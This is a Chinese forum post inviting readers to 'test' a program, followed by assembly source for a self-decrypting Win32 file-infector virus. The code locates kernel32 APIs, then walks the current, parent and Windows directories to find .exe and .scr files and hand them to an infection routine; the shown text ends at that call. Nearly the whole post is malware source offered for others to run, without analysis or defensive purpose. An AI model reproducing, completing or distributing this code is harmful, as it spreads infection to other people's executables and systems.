一个奇怪的病毒。。。有胆测试者进
最近写了个程序希望有人测试一下
代码如下::
.586p
.MODEL FLAT, STDCALL
INCLUDE C:\TOOLS\TASM\INCLUDE\WIN32API.INC
INCLUDE C:\TOOLS\TASM\INCLUDE\WINDOWS.INC
EXTRN ExitProcess:PROC
EXTRN MessageBoxA:PROC
.CONST
PAGINAS EQU 50d
KERNEL_9X EQU 0BFF70000h
GPA_HARDCODE EQU 0BFF76DACh
CRLF EQU <0Dh, 0Ah>
TAMA_VIRUS EQU (TERMINA_VIRUS - EMPIEZA_VIRUS)
TAMA_ENCRIPTADO EQU (TERMINA_VIRUS - EMPIEZA_CRYPT)
TAMA_DESENCRIPTOR EQU (EMPIEZA_CRYPT - EMPIEZA_VIRUS)
RDTSC EQU <DW 310Fh>
.DATA
MENSJE DB "xxxxx", CRLF
DB "xxxxx", CRLF, CRLF
DB "xxxxxxxxxx "
DB TAMA_VIRUS / 10000 MOD 10 + 30h
DB TAMA_VIRUS / 1000 MOD 10 + 30h
DB TAMA_VIRUS / 100 MOD 10 + 30h
DB TAMA_VIRUS / 10 MOD 10 + 30h
DB TAMA_VIRUS / 1 MOD 10 + 30h
DB 00h
TITLO DB "-= SRX =-", 00h
.CODE
SRX:
XOR EBP, EBP
JMP EMPIEZA_CRYPT
EMPIEZA_VIRUS LABEL NEAR
CALL @LA_YUCA
@ER_DERTA:
SUB EDX, OFFSET @ER_DERTA
JMP @EL_MONTE
@LA_YUCA:
POP EDX
JMP @ER_DERTA
@EL_MONTE:
XCHG EDX, EBP
MOV AL, 00h
ORG $-1
LLAVEX DB 00h
MOV ECX, TAMA_ENCRIPTADO
LEA ESI, OFFSET [EBP + EMPIEZA_CRYPT]
@@DC:
ADD BYTE PTR [ESI], AL
INC ESI
DEC AL
LOOP @@DC
PUSH OFFSET EMPIEZA_CRYPT
ADD DWORD PTR [ESP], EBP
JMP @Decriptor_2
EMPIEZA_CRYPT LABEL NEAR
JMP @@1
DB " [ALMA] "
@@1:
CALL Desencriptar_Datos
MOV EDI, DWORD PTR [ESP]
CALL Seh_Handler
MOV ESP, DWORD PTR [ESP+8h]
JMP _REVOL
Seh_Handler:
XOR EAX, EAX
PUSH DWORD PTR FS:[EAX]
MOV FS:[EAX], ESP
CALL BUSCA_KERNEL32
MOV DWORD PTR [EBP + KERNEL32], EAX
CALL BUSCA_GPA
MOV DWORD PTR [EBP + GetProcAddress], EAX
LEA EDI, OFFSET [EBP + Tabla_APIs_KERNEL32]
LEA ESI, OFFSET [EBP + CreateFileA]
CALL BUSCA_APIs
INC EAX
JZ _REVOL
LEA EAX, OFFSET [EBP + DIR_ORIGINAL]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JZ _REVOL
Busca_Primero:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
LEA EAX, OFFSET [EBP + Todo]
PUSH EAX
CALL [EBP + FindFirstFileA]
MOV DWORD PTR [EBP + SHandle], EAX
INC EAX
JZ Recupera_Directorio
DEC EAX
LaMamada:
LEA EDI, OFFSET [EBP + Busqueda.wfd_szFileName]
XOR EAX, EAX
MOV AL, "."
@@Z:
SCASB
JNZ @@Z
MOV EAX, DWORD PTR [EDI-1h]
OR EAX, 20202020h
CMP EAX, "exe."
JE Infecta_Este_Exe
CMP EAX, "rcs."
JE Infecta_Este_Exe
Busca_Proximo:
LEA EAX, OFFSET [EBP + Busqueda]
PUSH EAX
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindNextFileA]
OR EAX, EAX
JNZ LaMamada
PUSH DWORD PTR [EBP + SHandle]
CALL [EBP + FindClose]
LEA EAX, OFFSET [EBP + Puto_Puto]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
PUSH MAX_PATH
CALL [EBP + GetCurrentDirectoryA]
OR EAX, EAX
JE Termina_Directa
CMP DWORD PTR [EBP + Grueso], EAX
JE Termina_Directa
MOV DWORD PTR [EBP + Grueso], EAX
JMP Busca_Primero
Termina_Directa:
CMP BYTE PTR [EBP + WinDir_Infectado], TRUE
JZ Recupera_Directorio
MOV BYTE PTR [EBP + WinDir_Infectado], TRUE
PUSH MAX_PATH
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + GetWindowsDirectoryA]
OR EAX, EAX
JZ Recupera_Directorio
LEA EAX, OFFSET [EBP + Busqueda.wfd_szFileName]
PUSH EAX
CALL [EBP + SetCurrentDirectoryA]
JMP Busca_Primero
Recupera_Directorio:
LEA EAX, OFFSET [EBP + Dir_Original]
CALL [EBP + SetCurrentDirectoryA]
_REVOL:
XOR EAX, EAX
POP DWORD PTR FS:[EAX]
POP ECX
DB 068h ; PUSH
RETORNA DD OFFSET _PrimGen ; Primera Generacion
RET
Infecta_Este_Exe:
LEA EBX, OFFSET [EBP + Busqueda.wfd_szFileName]
CALL Infecta_Exe
JMP Busca_Proximo